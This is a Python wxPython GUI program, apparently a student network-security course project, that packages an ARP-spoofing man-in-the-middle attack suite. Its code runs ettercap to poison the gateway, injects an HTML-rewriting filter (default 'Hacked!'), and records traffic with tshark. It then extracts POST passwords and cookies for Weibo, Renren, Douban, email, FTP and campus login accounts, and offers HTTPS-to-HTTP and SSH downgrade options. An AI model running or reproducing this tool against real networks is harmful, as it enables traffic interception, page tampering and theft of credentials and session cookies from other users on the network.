#Boa:Frame:Frame1
#coding=utf-8
import wx
import wx.lib.buttons
import wx.richtext

import os 
import re
import time
from os import system
from threading import *


#Class For multi-Thread
class WorkerThread(Thread):
    def __init__(self, notify_window,command,stop):
        """Init Worker Thread Class."""
        Thread.__init__(self)
        self._notify_window = notify_window
        self._want_abort = stop
        self._command=command
        self.start()

    def run(self):
        system(self._command)
        if self._want_abort == 1: 
            return
    def abort(self):
        self._want_abort = 1


class WorkerThread1(Thread):
    def __init__(self, notify_window,command,command1,stop):
        """Init Worker Thread Class."""
        Thread.__init__(self)
        self._notify_window = notify_window
        self._want_abort = stop
        self._command=command
        self._command1=command1
        self.start()

    def run(self):
        system(self._command)
        system(self._command1)
        if self._want_abort == 1: 
            return
    def abort(self):
        self._want_abort = 1


#Generated by Boa
def create(parent):
    return Frame1(parent)

[wxID_FRAME1, wxID_FRAME1BUTTON1, wxID_FRAME1BUTTON2, wxID_FRAME1BUTTON3, 
 wxID_FRAME1BUTTON4, wxID_FRAME1BUTTON5, wxID_FRAME1CHECKBOX1, 
 wxID_FRAME1CHECKBOX10, wxID_FRAME1CHECKBOX11, wxID_FRAME1CHECKBOX12, 
 wxID_FRAME1CHECKBOX13, wxID_FRAME1CHECKBOX14, wxID_FRAME1CHECKBOX15, 
 wxID_FRAME1CHECKBOX16, wxID_FRAME1CHECKBOX2, wxID_FRAME1CHECKBOX3, 
 wxID_FRAME1CHECKBOX4, wxID_FRAME1CHECKBOX5, wxID_FRAME1CHECKBOX6, 
 wxID_FRAME1CHECKBOX7, wxID_FRAME1CHECKBOX8, wxID_FRAME1CHECKBOX9, 
 wxID_FRAME1GENBUTTON1, wxID_FRAME1GENBUTTON2, wxID_FRAME1PANEL1, 
 wxID_FRAME1PANEL2, wxID_FRAME1PANEL3, wxID_FRAME1PANEL4, wxID_FRAME1PANEL5, 
 wxID_FRAME1RICHTEXTCTRL1, wxID_FRAME1RICHTEXTCTRL2, wxID_FRAME1RICHTEXTCTRL3, 
 wxID_FRAME1RICHTEXTCTRL4, wxID_FRAME1STATICTEXT1, wxID_FRAME1STATICTEXT10, 
 wxID_FRAME1STATICTEXT11, wxID_FRAME1STATICTEXT12, wxID_FRAME1STATICTEXT13, 
 wxID_FRAME1STATICTEXT14, wxID_FRAME1STATICTEXT15, wxID_FRAME1STATICTEXT16, 
 wxID_FRAME1STATICTEXT17, wxID_FRAME1STATICTEXT2, wxID_FRAME1STATICTEXT3, 
 wxID_FRAME1STATICTEXT4, wxID_FRAME1STATICTEXT5, wxID_FRAME1STATICTEXT6, 
 wxID_FRAME1STATICTEXT7, wxID_FRAME1STATICTEXT8, wxID_FRAME1STATICTEXT9, 
 wxID_FRAME1TEXTCTRL1, wxID_FRAME1TEXTCTRL2, wxID_FRAME1TEXTCTRL3, 
 wxID_FRAME1TEXTCTRL5, wxID_FRAME1TEXTCTRL6, 
] = [wx.NewId() for _init_ctrls in range(55)]

[wxID_FRAME1MENU1ITEMS0, wxID_FRAME1MENU1ITEMS1, 
] = [wx.NewId() for _init_coll_menu1_Items in range(2)]



[wxID_FRAME1MENU2ITEMS0] = [wx.NewId() for _init_coll_menu2_Items in range(1)]

[wxID_FRAME1MENU3ITEMS0] = [wx.NewId() for _init_coll_menu3_Items in range(1)]

TMP_ROUTE='/tmp/tmp_route'
TMP_UNIVERSAL='/tmp/tmp_universal'
TMP_IFCONFIG='/tmp/tmp_ifocnfig'
class Frame1(wx.Frame):
    def _init_coll_menu3_Items(self, parent):
        # generated method, don't edit

        parent.Append(help='', id=wxID_FRAME1MENU3ITEMS0, kind=wx.ITEM_NORMAL,
              text=u'\u67e5\u770b\u5c0f\u7ec4\u4fe1\u606f')
        self.Bind(wx.EVT_MENU, self.OnMenu3Items0Menu,
              id=wxID_FRAME1MENU3ITEMS0)

    def _init_coll_menuBar1_Menus(self, parent):
        # generated method, don't edit

        parent.Append(menu=self.menu1, title=u'\u4e3b\u83dc\u5355')
        parent.Append(menu=self.menu2,
              title=u'\u79bb\u7ebf\u89e3\u5305\u5206\u6790')
        parent.Append(menu=self.menu3, title=u'\u5c0f\u7ec4\u4fe1\u606f')

    def _init_coll_menu1_Items(self, parent):
        # generated method, don't edit

        parent.Append(help='', id=wxID_FRAME1MENU1ITEMS1, kind=wx.ITEM_NORMAL,
              text=u'\u8bbe\u7f6e\u6b3a\u9a97\u7b56\u7565')
        parent.AppendSeparator()
        parent.Append(help='', id=wxID_FRAME1MENU1ITEMS0, kind=wx.ITEM_NORMAL,
              text=u'\u5f00\u59cbARP\u6b3a\u9a97')
        self.Bind(wx.EVT_MENU, self.OnMenu1Items1Menu,
              id=wxID_FRAME1MENU1ITEMS0)
        self.Bind(wx.EVT_MENU, self.OnMenu1Items0Menu,
              id=wxID_FRAME1MENU1ITEMS1)

    def _init_coll_menu2_Items(self, parent):
        # generated method, don't edit

        parent.Append(help='', id=wxID_FRAME1MENU2ITEMS0, kind=wx.ITEM_NORMAL,
              text=u'\u83b7\u53d6\u79bb\u7ebf\u5305')
        self.Bind(wx.EVT_MENU, self.OnMenu2Items0Menu,
              id=wxID_FRAME1MENU2ITEMS0)

    def _init_utils(self):
        # generated method, don't edit
        self.menu1 = wx.Menu(title=u'')

        self.menu2 = wx.Menu(title=u'')

        self.menuBar1 = wx.MenuBar()

        self.menu3 = wx.Menu(title=u'')

        self._init_coll_menu1_Items(self.menu1)
        self._init_coll_menu2_Items(self.menu2)
        self._init_coll_menuBar1_Menus(self.menuBar1)
        self._init_coll_menu3_Items(self.menu3)

    def _init_ctrls(self, prnt):
        # generated method, don't edit
        wx.Frame.__init__(self, id=wxID_FRAME1, name='', parent=prnt,
              pos=wx.Point(554, 25), size=wx.Size(850, 650),
              style=wx.DEFAULT_FRAME_STYLE,
              title=u'\u57fa\u4e8eARP\u6b3a\u9a97\u7684\u4e2d\u95f4\u4eba\u653b\u51fb\u5957\u4ef6')
        self._init_utils()
        self.SetClientSize(wx.Size(850, 650))
        self.SetMenuBar(self.menuBar1)
        self.Show(True)
        self.SetFont(wx.Font(10, wx.SWISS, wx.NORMAL, wx.NORMAL, False,u'Sans'))

        self.panel1 = wx.Panel(id=wxID_FRAME1PANEL1, name='panel1', parent=self,
              pos=wx.Point(0, 0), size=wx.Size(850, 600),
              style=wx.TAB_TRAVERSAL)
        self.panel1.Show(False)
        self.panel1.Bind(wx.EVT_ENTER_WINDOW, self.OnPanel1EnterWindow)

        self.button1 = wx.Button(id=wxID_FRAME1BUTTON1,
              label=u'\u5f00\u59cbARP\u6b3a\u9a97', name='button1',
              parent=self.panel1, pos=wx.Point(56, 392), size=wx.Size(160, 88),
              style=0)
        self.button1.Bind(wx.EVT_BUTTON, self.OnButton1Button,
              id=wxID_FRAME1BUTTON1)

        self.panel2 = wx.Panel(id=wxID_FRAME1PANEL2, name='panel2', parent=self,
              pos=wx.Point(-64, -160), size=wx.Size(20, 20),
              style=wx.TAB_TRAVERSAL)

        self.staticText1 = wx.StaticText(id=wxID_FRAME1STATICTEXT1,
              label=u'\u5f53\u524d\u5b50\u7f51\u4fe1\u606f', name='staticText1',
              parent=self.panel1, pos=wx.Point(32, 40), size=wx.Size(132, 27),
              style=0)
        self.staticText1.SetFont(wx.Font(16, wx.SWISS, wx.NORMAL, wx.BOLD,
              False, u'Sans'))

        self.staticText2 = wx.StaticText(id=wxID_FRAME1STATICTEXT2,
              label=u'\u5b50\u7f51\u63a9\u7801', name='staticText2',
              parent=self.panel1, pos=wx.Point(32, 104), size=wx.Size(84, 27),
              style=0)
        self.staticText2.SetFont(wx.Font(15, wx.SWISS, wx.NORMAL, wx.BOLD,
              False, u'Sans'))

        self.staticText3 = wx.StaticText(id=wxID_FRAME1STATICTEXT3,
              label=u'\u7f51\u5173', name='staticText3', parent=self.panel1,
              pos=wx.Point(40, 232), size=wx.Size(51, 31), style=0)
        self.staticText3.SetFont(wx.Font(17, wx.SWISS, wx.NORMAL, wx.BOLD,
              False, u'Sans'))

        self.staticText4 = wx.StaticText(id=wxID_FRAME1STATICTEXT4,
              label=u'UNKnow', name=u'staticText4', parent=self.panel1,
              pos=wx.Point(40, 160), size=wx.Size(89, 23), style=0)
        self.staticText4.SetFont(wx.Font(14, wx.SWISS, wx.NORMAL, wx.BOLD,
              False, u'Sans'))

        self.staticText5 = wx.StaticText(id=wxID_FRAME1STATICTEXT5,
              label=u'Unknow', name='staticText5', parent=self.panel1,
              pos=wx.Point(40, 304), size=wx.Size(84, 23), style=0)
        self.staticText5.SetFont(wx.Font(14, wx.SWISS, wx.NORMAL, wx.BOLD,
              False, u'Sans'))

        self.textCtrl1 = wx.TextCtrl(id=wxID_FRAME1TEXTCTRL1, name='textCtrl1',
              parent=self.panel1, pos=wx.Point(248, 672), size=wx.Size(616,
              336), style=0, value='textCtrl1')

        self.staticText6 = wx.StaticText(id=wxID_FRAME1STATICTEXT6,
              label=u'ARP\u6b3a\u9a97+\u4e2d\u95f4\u4eba\u653b\u51fb\u53cd\u9988\u4fe1\u606f',
              name='staticText6', parent=self.panel1, pos=wx.Point(280, 32),
              size=wx.Size(306, 29), style=0)
        self.staticText6.SetFont(wx.Font(16, wx.SWISS, wx.NORMAL, wx.BOLD,
              False, u'Sans'))

        self.panel3 = wx.Panel(id=wxID_FRAME1PANEL3, name='panel3', parent=self,
              pos=wx.Point(0, 0), size=wx.Size(850, 600),
              style=wx.TAB_TRAVERSAL)
        self.panel3.SetFont(wx.Font(9, wx.SWISS, wx.NORMAL, wx.NORMAL, False,
              u'Tahoma'))
        self.panel3.Show(False)

        self.textCtrl3 = wx.TextCtrl(id=wxID_FRAME1TEXTCTRL3, name='textCtrl3',
              parent=self.panel3, pos=wx.Point(376, 88), size=wx.Size(224, 32),
              style=0, value=u'<title>Hacked! ')

        self.textCtrl2 = wx.TextCtrl(id=wxID_FRAME1TEXTCTRL2, name='textCtrl2',
              parent=self.panel3, pos=wx.Point(72, 88), size=wx.Size(208, 32),
              style=0, value=u'<title>')
        self.textCtrl2.SetToolTipString(u'textCtrl2')

        self.staticText7 = wx.StaticText(id=wxID_FRAME1STATICTEXT7,
              label=u'\u66ff\u6362\u6210', name='staticText7',
              parent=self.panel3, pos=wx.Point(304, 96), size=wx.Size(36, 14),
              style=0)

        self.checkBox1 = wx.CheckBox(id=wxID_FRAME1CHECKBOX1,
              label=u'HTML \u5185\u5bb9\u66ff\u6362', name='checkBox1',
              parent=self.panel3, pos=wx.Point(-272, 8), size=wx.Size(168, 32),
              style=0)
        self.checkBox1.SetValue(False)
        self.checkBox1.SetFont(wx.Font(12, wx.SWISS, wx.NORMAL, wx.BOLD, False,
              u'Tahoma'))

        self.checkBox2 = wx.CheckBox(id=wxID_FRAME1CHECKBOX2,
              label=u'\u5f3a\u5236SSH2\u8f6c\u6362SSH1', name='checkBox2',
              parent=self.panel3, pos=wx.Point(64, 360), size=wx.Size(320, 48),
              style=0)
        self.checkBox2.SetValue(False)
        self.checkBox2.SetFont(wx.Font(18, wx.SWISS, wx.NORMAL, wx.BOLD, False,
              u'Tahoma'))
        self.checkBox2.Bind(wx.EVT_CHECKBOX, self.OnCheckBox2Checkbox,
              id=wxID_FRAME1CHECKBOX2)

        self.checkBox3 = wx.CheckBox(id=wxID_FRAME1CHECKBOX3,
              label=u'\u9632\u6b62HTTP\u5185\u5bb9\u538b\u7f29',
              name='checkBox3', parent=self.panel3, pos=wx.Point(64, 200),
              size=wx.Size(280, 64), style=0)
        self.checkBox3.SetValue(True)
        self.checkBox3.SetFont(wx.Font(18, wx.SWISS, wx.NORMAL, wx.BOLD, False,
              u'Tahoma'))

        self.checkBox4 = wx.CheckBox(id=wxID_FRAME1CHECKBOX4,
              label=u'\u5b9e\u65f6\u52a0\u5165\u65b0\u4e3b\u673a',
              name='checkBox4', parent=self.panel3, pos=wx.Point(64, 136),
              size=wx.Size(264, 48), style=0)
        self.checkBox4.SetValue(False)
        self.checkBox4.SetFont(wx.Font(18, wx.SWISS, wx.NORMAL, wx.BOLD, False,
              u'Tahoma'))
        self.checkBox4.Enable(True)

        self.checkBox5 = wx.CheckBox(id=wxID_FRAME1CHECKBOX5,
              label=u'\u5f3a\u5236HTTPS\u8f6c\u6362\u5230HTTP',
              name='checkBox5', parent=self.panel3, pos=wx.Point(64, 280),
              size=wx.Size(288, 64), style=0)
        self.checkBox5.SetValue(True)
        self.checkBox5.SetFont(wx.Font(18, wx.SWISS, wx.NORMAL, wx.BOLD, False,
              u'Tahoma'))

        self.staticText8 = wx.StaticText(id=wxID_FRAME1STATICTEXT8,
              label=u'\u7f51\u7edc\u63a5\u53e3\u5361', name='staticText8',
              parent=self.panel3, pos=wx.Point(440, 248), size=wx.Size(85, 22),
              style=0)
        self.staticText8.SetFont(wx.Font(12, wx.SWISS, wx.NORMAL, wx.BOLD,
              False, u'Tahoma'))

        self.textCtrl5 = wx.TextCtrl(id=wxID_FRAME1TEXTCTRL5, name='textCtrl5',
              parent=self.panel3, pos=wx.Point(432, 296), size=wx.Size(104, 32),
              style=0, value=u'')

        self.button2 = wx.Button(id=wxID_FRAME1BUTTON2,
              label=u'\u5b58\u50a8\u7b56\u7565\u4fe1\u606f', name='button2',
              parent=self.panel3, pos=wx.Point(384, 360), size=wx.Size(216, 80),
              style=0)
        self.button2.Bind(wx.EVT_BUTTON, self.OnButton2Button,
              id=wxID_FRAME1BUTTON2)

        self.panel4 = wx.Panel(id=wxID_FRAME1PANEL4, name='panel4', parent=self,
              pos=wx.Point(0, 0), size=wx.Size(850, 600),
              style=wx.TAB_TRAVERSAL)
        self.panel4.SetFont(wx.Font(12, wx.SWISS, wx.NORMAL, wx.BOLD, False,
              u'Tahoma'))
        self.panel4.Show(False)

        self.staticText9 = wx.StaticText(id=wxID_FRAME1STATICTEXT9,
              label=u'pcap\u6587\u4ef6\u7edd\u5bf9\u8def\u5f84',
              name='staticText9', parent=self.panel4, pos=wx.Point(40, 32),
              size=wx.Size(143, 22), style=0)
        self.staticText9.SetFont(wx.Font(12, wx.SWISS, wx.NORMAL, wx.BOLD,
              False, u'Tahoma'))

        self.checkBox6 = wx.CheckBox(id=wxID_FRAME1CHECKBOX6,
              label=u'\u8c46\u74e3\u8d26\u53f7\u5206\u6790', name='checkBox6',
              parent=self.panel4, pos=wx.Point(40, 240), size=wx.Size(176, 48),
              style=0)
        self.checkBox6.SetValue(False)

        self.checkBox7 = wx.CheckBox(id=wxID_FRAME1CHECKBOX7,
              label=u'\u5fae\u535a\u8d26\u53f7\u5206\u6790', name='checkBox7',
              parent=self.panel4, pos=wx.Point(40, 312), size=wx.Size(176, 40),
              style=0)
        self.checkBox7.SetValue(True)

        self.checkBox8 = wx.CheckBox(id=wxID_FRAME1CHECKBOX8,
              label=u'\u5fae\u535aCookie\u5206\u6790', name='checkBox8',
              parent=self.panel4, pos=wx.Point(40, 176), size=wx.Size(176, 48),
              style=0)
        self.checkBox8.SetValue(True)

        self.checkBox9 = wx.CheckBox(id=wxID_FRAME1CHECKBOX9,
              label=u'\u4eba\u4eba\u7f51Cookie\u5206\u6790', name='checkBox9',
              parent=self.panel4, pos=wx.Point(40, 104), size=wx.Size(176, 48),
              style=0)
        self.checkBox9.SetValue(True)

        self.textCtrl6 = wx.TextCtrl(id=wxID_FRAME1TEXTCTRL6, name='textCtrl6',
              parent=self.panel4, pos=wx.Point(232, 24), size=wx.Size(160, 32),
              style=0, value=u'/var/sec/packets.cap')
        self.textCtrl6.SetFont(wx.Font(9, wx.SWISS, wx.NORMAL, wx.NORMAL, False,
              u'Tahoma'))

        self.checkBox10 = wx.CheckBox(id=wxID_FRAME1CHECKBOX10,
              label=u'\u90ae\u7bb1\u8d26\u53f7\u5bc6\u7801', name='checkBox10',
              parent=self.panel4, pos=wx.Point(264, 112), size=wx.Size(168, 40),
              style=0)
        self.checkBox10.SetValue(True)

        self.checkBox11 = wx.CheckBox(id=wxID_FRAME1CHECKBOX11,
              label=u'Dr.Com\u8d26\u53f7\u5bc6\u7801', name='checkBox11',
              parent=self.panel4, pos=wx.Point(264, 176), size=wx.Size(152, 48),
              style=0)
        self.checkBox11.SetValue(True)

        self.checkBox12 = wx.CheckBox(id=wxID_FRAME1CHECKBOX12,
              label=u'ChinaUnicom \u767b\u9646\u8d26\u53f7\u5bc6\u7801',
              name='checkBox12', parent=self.panel4, pos=wx.Point(40, 368),
              size=wx.Size(248, 64), style=0)
        self.checkBox12.SetValue(False)

        self.checkBox13 = wx.CheckBox(id=wxID_FRAME1CHECKBOX13,
              label=u'\u4eba\u4eba\u7f51\u8d26\u53f7\u5bc6\u7801',
              name='checkBox13', parent=self.panel4, pos=wx.Point(264, 256),
              size=wx.Size(144, 32), style=0)
        self.checkBox13.SetValue(False)

        self.richTextCtrl1 = wx.richtext.RichTextCtrl(id=wxID_FRAME1RICHTEXTCTRL1,
              parent=self.panel4, pos=wx.Point(440, 24), size=wx.Size(368, 208),
              style=wx.richtext.RE_MULTILINE,
              value=u'\u5bc6\u7801\u55c5\u63a2\u5206\u6790\u7ed3\u679c')
        self.richTextCtrl1.SetLabel(u'richText')
        self.richTextCtrl1.SetToolTipString(u'richTextCtrl1')
        self.richTextCtrl1.SetFont(wx.Font(10, wx.SWISS, wx.NORMAL, wx.NORMAL,
              False, u'Sans'))

        self.button3 = wx.Button(id=wxID_FRAME1BUTTON3,
              label=u'\u5f00\u59cb\u5206\u6790', name='button3',
              parent=self.panel4, pos=wx.Point(248, 440), size=wx.Size(152, 64),
              style=0)
        self.button3.Bind(wx.EVT_BUTTON, self.OnButton3Button,
              id=wxID_FRAME1BUTTON3)

        self.panel5 = wx.Panel(id=wxID_FRAME1PANEL5, name='panel5', parent=self,
              pos=wx.Point(0, 0), size=wx.Size(850, 600),
              style=wx.TAB_TRAVERSAL)
        self.panel5.SetFont(wx.Font(18, wx.SWISS, wx.NORMAL, wx.BOLD, False,
              u'Lucida Sans Unicode'))

        self.staticText10 = wx.StaticText(id=wxID_FRAME1STATICTEXT10,
              label=u'\u7f51\u7edc\u4fe1\u606f\u5b89\u5168-\u8bfe\u7a0b\u4f5c\u4e1a',
              name='staticText10', parent=self.panel5, pos=wx.Point(304, 24),
              size=wx.Size(233, 29), style=0)
        self.staticText10.SetFont(wx.Font(16, wx.SWISS, wx.NORMAL, wx.BOLD,
              False, u'Lucida Sans Unicode'))

        self.staticText11 = wx.StaticText(id=wxID_FRAME1STATICTEXT11,
              label=u'\u7ec4\u957f\uff1a\u8d75\u8c6a B10040628',
              name='staticText11', parent=self.panel5, pos=wx.Point(40, 168),
              size=wx.Size(336, 48), style=0)

        self.staticText12 = wx.StaticText(id=wxID_FRAME1STATICTEXT12,
              label=u'\u674e\u601d\u4f73 B10040703', name='staticText12',
              parent=self.panel5, pos=wx.Point(112, 336), size=wx.Size(272, 56),
              style=0)

        self.staticText13 = wx.StaticText(id=wxID_FRAME1STATICTEXT13,
              label=u'\u674e\u9759 B10040704', name='staticText13',
              parent=self.panel5, pos=wx.Point(440, 344), size=wx.Size(280, 48),
              style=0)

        self.staticText14 = wx.StaticText(id=wxID_FRAME1STATICTEXT14,
              label=u'\u5b59\u9759\u6021 B10110212', name='staticText14',
              parent=self.panel5, pos=wx.Point(440, 240), size=wx.Size(336, 48),
              style=0)

        self.staticText15 = wx.StaticText(id=wxID_FRAME1STATICTEXT15,
              label=u'\u7ec4\u5458\uff1a\u4fde\u4e91\u5929 B10040629',
              name='staticText15', parent=self.panel5, pos=wx.Point(40, 240),
              size=wx.Size(360, 40), style=0)

        self.staticText16 = wx.StaticText(id=wxID_FRAME1STATICTEXT16,
              label=u'\u57fa\u4e8eARP\u6b3a\u9a97\u7684\u4e2d\u95f4\u4eba\u653b\u51fb\u5957\u4ef6',
              name='staticText16', parent=self.panel5, pos=wx.Point(232, 88),
              size=wx.Size(350, 33), style=0)
        self.staticText16.SetFont(wx.Font(18, wx.SWISS, wx.NORMAL, wx.BOLD,
              False, u'Lucida Sans Unicode'))

        self.checkBox14 = wx.CheckBox(id=wxID_FRAME1CHECKBOX14,
              label=u'\u66ff\u6362HTML\u5185\u5bb9', name='checkBox14',
              parent=self.panel3, pos=wx.Point(-16, -248), size=wx.Size(168,
              24), style=0)
        self.checkBox14.SetFont(wx.Font(12, wx.SWISS, wx.NORMAL, wx.BOLD, False,
              u'Tahoma'))
        self.checkBox14.SetValue(False)

        self.checkBox15 = wx.CheckBox(id=wxID_FRAME1CHECKBOX15,
              label=u'FTP\u8d26\u53f7\u5bc6\u7801', name='checkBox15',
              parent=self.panel4, pos=wx.Point(264, 328), size=wx.Size(160, 24),
              style=0)
        self.checkBox15.SetFont(wx.Font(14, wx.SWISS, wx.NORMAL, wx.BOLD, False,
              u'Tahoma'))
        self.checkBox15.SetValue(True)

        self.checkBox16 = wx.CheckBox(id=wxID_FRAME1CHECKBOX16,
              label=u'HTML \u5185\u5bb9\u66ff\u6362', name='checkBox16',
              parent=self.panel3, pos=wx.Point(56, 32), size=wx.Size(296, 24),
              style=0)
        self.checkBox16.SetFont(wx.Font(18, wx.SWISS, wx.NORMAL, wx.BOLD, False,
              u'Tahoma'))
        self.checkBox16.SetValue(True)
        self.checkBox16.Bind(wx.EVT_CHECKBOX, self.OnCheckBox16Checkbox,
              id=wxID_FRAME1CHECKBOX16)

        self.staticText17 = wx.StaticText(id=wxID_FRAME1STATICTEXT17,
              label='staticText17', name='staticText17', parent=self.panel1,
              pos=wx.Point(-400, -272), size=wx.Size(328, 384), style=0)

        self.genButton1 = wx.lib.buttons.GenButton(id=wxID_FRAME1GENBUTTON1,
              label=u'\u5237\u65b0', name='genButton1', parent=self.panel1,
              pos=wx.Point(424, 264), size=wx.Size(256, 48), style=0)
        self.genButton1.Bind(wx.EVT_BUTTON, self.OnGenButton1Button,
              id=wxID_FRAME1GENBUTTON1)

        self.button4 = wx.Button(id=wxID_FRAME1BUTTON4,
              label=u'\u505c\u6b62ARP\u6b3a\u9a97', name='button4',
              parent=self.panel1, pos=wx.Point(56, 488), size=wx.Size(160, 88),
              style=0)
        self.button4.Show(False)
        self.button4.Bind(wx.EVT_BUTTON, self.OnButton4Button,
              id=wxID_FRAME1BUTTON4)

        self.richTextCtrl2 = wx.richtext.RichTextCtrl(id=wxID_FRAME1RICHTEXTCTRL2,
              parent=self.panel1, pos=wx.Point(272, 72), size=wx.Size(528, 192),
              style=wx.richtext.RE_MULTILINE,
              value=u'\u4e2d\u95f4\u4eba\u653b\u51fb\u4fe1\u606f')
        self.richTextCtrl2.SetLabel(u'')
        self.richTextCtrl2.SetFont(wx.Font(10, wx.SWISS, wx.NORMAL, wx.NORMAL,
              False, u'Sans'))

        self.richTextCtrl3 = wx.richtext.RichTextCtrl(id=wxID_FRAME1RICHTEXTCTRL3,
              parent=self.panel1, pos=wx.Point(288, 312), size=wx.Size(520,
              192), style=wx.richtext.RE_MULTILINE,
              value=u'ARP\u6b3a\u9a97\u65e5\u5fd7\u4fe1\u606f')
        self.richTextCtrl3.SetLabel(u'richText')
        self.richTextCtrl3.SetFont(wx.Font(10, wx.SWISS, wx.NORMAL, wx.NORMAL,
              False, u'Sans'))

        self.button5 = wx.Button(id=wxID_FRAME1BUTTON5,
              label=u'\u505c\u6b62\u5206\u6790', name='button5',
              parent=self.panel4, pos=wx.Point(48, 440), size=wx.Size(152, 63),
              style=0)
        self.button5.Show(False)
        self.button5.Bind(wx.EVT_BUTTON, self.OnButton5Button,
              id=wxID_FRAME1BUTTON5)

        self.genButton2 = wx.lib.buttons.GenButton(id=wxID_FRAME1GENBUTTON2,
              label=u'\u5237\u65b0', name='genButton2', parent=self.panel4,
              pos=wx.Point(520, 248), size=wx.Size(232, 31), style=0)
        self.genButton2.Bind(wx.EVT_BUTTON, self.OnGenButton2Button,
              id=wxID_FRAME1GENBUTTON2)

        self.richTextCtrl4 = wx.richtext.RichTextCtrl(id=wxID_FRAME1RICHTEXTCTRL4,
              parent=self.panel4, pos=wx.Point(440, 296), size=wx.Size(368,
              208), style=wx.richtext.RE_MULTILINE,
              value=u'Cookie\u52ab\u6301\u7ed3\u679c')
        self.richTextCtrl4.SetLabel(u'richText')
        self.richTextCtrl4.SetFont(wx.Font(10, wx.SWISS, wx.NORMAL, wx.NORMAL,
              False, u'Sans'))

    def __init__(self,parent, redirect=True,filename=None):
        self._init_ctrls(parent)
        self.interface='wlan0'

#Code coded By Tiger
    def get_gateway ( self,wlan_if ) :
        system ( "LANG=C route -n  > %s " %  TMP_ROUTE )
        if system ( "egrep '^0.0.0.0' %s | grep %s > %s" %\
                (TMP_ROUTE , wlan_if , TMP_UNIVERSAL ) ) != 0 :
            return 'UnKnow'
        fd = open ( TMP_UNIVERSAL , "r" )
        for each_line in fd :
            gateway = re.split ( "\s+" , each_line )[1]
        fd.close ()
        system ( "rm %s 2>/dev/null " % TMP_UNIVERSAL )
        return gateway
    def get_netmask (self,wlan_if ) :
        system ( "LANG=C ifconfig %s > %s" % ( wlan_if , TMP_IFCONFIG ))
        if system ( "grep Mask %s > %s" % \
                ( TMP_IFCONFIG, TMP_UNIVERSAL ) ) != 0 :
            return 'UnNknow'
        fd = open ( TMP_UNIVERSAL , "r" )
        for eachline in fd :
            tmp_line = re.split ( "\s+" , eachline )
            netmask = re.sub ( "Mask:" , "" , tmp_line[4] )
        fd.close ()
        system ( "rm %s 2>/dev/null " % TMP_UNIVERSAL )
        return netmask
    
#Ended Code coded By Tiger





    def OnMenu1Items0Menu(self, event):
        self.panel1.Shown=False
        self.panel3.Shown=True
        self.panel4.Shown=False
        self.panel5.Shown=False

    def OnRadioBox1Radiobox(self, event):
        event.Skip()

    def OnCheckBox2Checkbox(self, event):
        event.Skip()

    def OnMenu3Items0Menu(self, event):
        self.panel1.Shown=False
        self.panel3.Shown=False
        self.panel4.Shown=False
        self.panel5.Shown=True

    def OnMenu1Items1Menu(self, event):
        self.panel1.Shown=True
        self.panel3.Shown=False
        self.panel4.Shown=False
        self.panel5.Shown=False
    def OnMenu2Items0Menu(self, event):
        self.panel1.Shown=False
        self.panel3.Shown=False
        self.panel4.Shown=True
        self.panel5.Shown=False

    def OnButton2Button(self, event):


        ori=self.textCtrl2.Value
        new=self.textCtrl3.Value
        self.interface=self.textCtrl5.Value

	#Set Filters
        s="if (ip.proto == TCP && tcp.src == 80) {\n\tif (search(DATA.data,\""+ori+"\")) {\n\t\t replace(\""+ori+"\",\""+new+"\");\n\t}\n}"
        system("cp /var/sec/filter.txt /var/sec/fuck.txt")
        f=open('/var/sec/fuck.txt','a')
        f.write(s)
        f.close()
        system('etterfilter -o /var/sec/filter.efi /var/sec/fuck.txt')
        system("rm /var/sec/fuck.txt")
	#Ended set  Filters

        s=self.get_gateway(self.interface)
        self.staticText5.Label=s
        
        s2=self.get_netmask(self.interface)
        self.staticText4.Label=s2
        
        dlg = wx.MessageDialog(None, "ARP欺骗策略生成成功，是否进入下一步?",
                          '策略生成成功',wx.YES_NO | wx.ICON_QUESTION)
                    
        retCode = dlg.ShowModal()
        if (retCode == wx.ID_YES):
            self.panel1.Shown=True
            self.panel3.Shown=False
            self.panel4.Shown=False
            self.panel5.Shown=False
        dlg.Destroy()

    def OnPanel1EnterWindow(self, event):
        print('s')

    def OnButton1Button(self, event):

	#Set MTU to avoid an ERROR from ettercap
        system("ifconfig "+self.interface+" mtu 9000")
	#End Set

        gateway=self.get_gateway(self.interface)
        print gateway
        self.button4.Shown=True
        self.button1.Shown=False
        print(self.interface)


	#Use multi-Thread to execute tshark and ettercap 
        tshark_command="tshark -i "+self.interface+" -w /var/sec/packets.cap"
        arp_command="ettercap -i "+self.interface+" -Tq -M arp:remote /"+gateway+"/ // -p autoadd -F /var/sec/filter.efi -l /var/sec/info -m /var/sec/msg"
        self.ettercap=WorkerThread(self,arp_command,0)
        self.tshark=WorkerThread(self,tshark_command,0)
        #End Use 


    def OnGenButton1Button(self, event):

        
	#Log Processing and Show them in richTextCtrl
	system("python /var/sec/info_process.py")
        s=open('/var/sec/log','r')   
        self.richTextCtrl2.Value=s.read()
        s.close()
        s1=open('/var/sec/msg','r')
        self.richTextCtrl3.Value=s1.read()
        s1.close()
	#End Log


    def OnButton4Button(self, event):
	
	#Kill the Processing
        self.ettercap.abort()
        self.tshark.abort()
        stop_arp_command="ps -ef|awk \'$8~/ettercap/{print \"kill -9 \"$2}\' |sh"
        stop_tshark_command="ps -ef|awk \'$8~/tshark/{print \"kill -9 \"$2}\' |sh"
        self.stop_ettercap=WorkerThread(self,stop_arp_command,1)
        self.stop_ettercap=WorkerThread(self,stop_tshark_command,1)
        #End Kill

	self.button4.Shown=False
        
       	dlg1 = wx.MessageDialog(None, "ARP欺骗已经结束，是否进行COOkie解析?",
                          'ARP欺骗已停止',wx.YES_NO | wx.ICON_QUESTION)
        retCode1 = dlg1.ShowModal()
        if (retCode1 == wx.ID_YES):
            self.panel1.Shown=False
            self.panel3.Shown=False
            self.panel4.Shown=True
            self.panel5.Shown=False
        dlg1.Destroy()

    def OnButton3Button(self, event):
        file=self.textCtrl6.Value
        self.button5.Shown=True
        self.button3.Shown=False

	#Analysis the pcap file
        passwd_command="tshark -r "+file+" -R \'http.request.method==\"POST\"&&(http contains DDDD||http contains pass)\' -T fields -e http.host -e text >/var/sec/pcap_log_"
        cookie_command="tshark -r "+file+" -R \'http.cookie\' -T fields -e http.host -e http.cookie >/var/sec/pcap_cookie_"
        cookie_command1="python /var/sec/cookie_process.py "
        self.passwdthread=WorkerThread(self,passwd_command,0)
        self.cookiethread=WorkerThread1(self,cookie_command,cookie_command1,0)
	#End Analysis 

    def OnButton5Button(self, event):
        self.button5.Shown=False
        self.button3.Shown=True
        dlg2 = wx.MessageDialog(None, "包解析已经结束",'包解析已经停止',wx.OK | wx.ICON_QUESTION)  
